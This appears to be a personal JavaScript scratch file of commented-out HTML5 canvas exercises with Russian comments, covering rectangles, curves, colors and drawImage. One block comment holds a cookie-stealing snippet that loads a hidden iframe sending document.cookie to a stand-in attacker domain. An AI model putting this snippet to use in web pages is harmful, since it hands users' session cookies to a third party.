//example.style.border = "1px solid #000";
			//ctx.fillRect(0, 0, example.width, example.height);
			/*example.width  = 640;
            example.height = 480;
            ctx.strokeRect(15, 15, 266, 266);
            ctx.strokeRect(18, 18, 260, 260);
            ctx.fillRect(20, 20, 256, 256);
            for (i = 0; i < 8; i += 2)
                for (j = 0; j < 8; j += 2) {
                    ctx.clearRect(20 + i * 32, 20 + j * 32, 32, 32);
                    ctx.clearRect(20 + (i + 1) * 32, 20 + (j + 1) * 32, 32, 32);
                }*/
				/*ctx.beginPath();
			ctx.arc(80, 100, 56, 3/4 * Math.PI, 1/4 * Math.PI, true);
			ctx.fill(); // *14
			ctx.moveTo(40, 140);
			ctx.lineTo(20, 40);
			ctx.lineTo(60, 100);
			ctx.lineTo(80, 20);
			ctx.lineTo(100, 100);
			ctx.lineTo(140, 40);
			ctx.lineTo(120, 140);
			ctx.stroke(); // *22*/
			/*ctx.beginPath();
			ctx.moveTo(10, 15);
			ctx.bezierCurveTo(75, 55, 175, 20, 250, 15);
			ctx.moveTo(10, 15);
			ctx.quadraticCurveTo(100, 100, 250, 15);
			ctx.stroke();
			*/
			/*
			fillStyle = color   // определяет цвет заливки 
			strokeStyle = color // цвет линий цвет задается точно так же как и css, на примере все четыре способа задания цвета
			// все четыре строки задают оранжевый цвет заливки
			ctx.fillStyle = "orange";
			ctx.fillStyle = "#FFA500";
			ctx.fillStyle = "rgb(255,165,0)";
			ctx.fillStyle = "rgba(255,165,0,1)"
			*/
			/*ctx.strokeStyle = '#B70A02'; // меняем цвет рамки
			ctx.strokeRect(15, 15, 266, 266);
			ctx.strokeRect(18, 18, 260, 260);
			ctx.fillStyle = '#AF5200'; // меняем цвет клеток
			ctx.fillRect(20, 20, 256, 256);
			for (i = 0; i < 8; i += 2)
				for (j = 0; j < 8; j += 2) {
					ctx.clearRect(20 + i * 32, 20 + j * 32, 32, 32);
					ctx.clearRect(20 + (i + 1) * 32, 20 + (j + 1) * 32, 32, 32);
				}*/
		
			/*var img = new Image();  // Создание нового объекта изображения
			img.src = 'image.png';  // Путь к изображению которое необходимо нанести на холст
			drawImage(image, x, y) // Где x и y это координаты левого верхнего угла изображения, а первый параметр это изображение
			var img = new Image();      // Новый объект
			  img.onload = function() { // Событие которое будет исполнено в момент когда изображение будет загружено
				/*
				  Какие-либо действия
				*/
			/*}
			img.src = 'myImage.png';    // Путь к изображению*/
			
			

 //pic       = new Image();              // "Создаём" изображение			
//pic.src    = 'http://habrahabr.ru/i/nocopypast.png';  // Источник изображения, позаимствовано на хабре
     // pic.onload = function() {    // Событие onLoad, ждём момента пока загрузится изображение
        //ctx.drawImage(pic, 0, 0);  // Рисуем изображение от точки с координатами 0, 0
     // }			
	  
	  //drawImage(image, x, y, width, height)  //  параметры width, height меняют ширину и высоту изображения
			//ctx.drawImage(pic, 0, 0, 300, 150);
			
		/*Фрагмент изо*/	
			//drawImage(image, sx, sy, sWidth, sHeight, dx, dy, dWidth, dHeight);
// Первый параметр указывает на изображение
// sx, sy, sWidth, sHeight указывают параметры фрагмента на изображение-источнике
// dx, dy, dWidth, dHeight ответственны за координаты отрисовки фрагмента на холсте
/*
MyObject = {
    id : 1,
    name : "Sample",
    boolval : true,
    getName : function()
    {
        return this.name;
    },
	x : 1,
	y : 2,
	eruytge : "srth"
} 
window.alert("2134234");
window.alert(MyObject.name);
window.alert(MyObject.y);
window.alert(MyObject.eruytge);



var i = document.createElement('iframe');
i.style='width: 1px; height: 1px; visibility: hidden;';
document.getElementsByTagName('body')[0].appendChild(i);
i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie;



function getChar(event) {
  if (event.which == null) { // IE
    if (event.keyCode < 32) return null; // спец. символ
    return String.fromCharCode(event.keyCode)
  }

  if (event.which != 0 && event.charCode != 0) { // все кроме IE
    if (event.which < 32) return null; // спец. символ
    return String.fromCharCode(event.which); // остальные
  }

  return null; // спец. символ
}


вырезание изображения и размещение его на холсте
drawImage(image, sx, sy, sWidth, sHeight, dx, dy, dWidth, dHeight)
	*/
